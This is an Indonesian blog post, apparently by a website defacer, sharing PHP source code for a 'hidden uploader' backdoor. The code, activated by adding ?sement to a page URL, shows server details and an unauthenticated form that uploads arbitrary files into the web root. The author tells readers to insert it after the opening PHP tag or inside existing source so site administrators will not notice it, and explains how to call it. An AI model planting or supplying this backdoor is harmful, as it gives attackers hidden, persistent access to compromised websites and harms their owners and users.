[PHP] Hidden Uploader
Kali ini Saya akan membahas tentang Hidden Uploader,
Hidden Uploader biasanya di pasang oleh se orang defacer agar dia dapat menyembunyikan akses nya di dalam target nya.
Biasanya Hidden Uploader dipanggil dengan sebuah parameter
Langsung Saja Ini dia Source Code Hidden Uploader :
if(isset($_GET["sement"])){
echo "Home Root Hidden Uploader";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='idx_file'><input type='submit' name='upload' value='upload'></form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/";
echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>"; } else {
echo "gagal upload di document root.";}
} else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "Gagal Cok";
}
}
}
}
Letakkan Source Code Diatas di setelah code <?php atau di tengah tengah Source Code Asli agar tidak gampang di ketahui oleh admin web
Cara Memanggil Uploader :
Contoh saya menaruh Uploader di file index.php Cara memanggil Uploader Nya adalah menambahkan Parameter ?sement di bagian setelah index.php yaitu menjadi index.php?sement
Sekian Artikel Kali ini Jika Ada yg salah saya mohon Maaf :)
Wasalamu'alaikum Wr Wb

No comments :
Post a Comment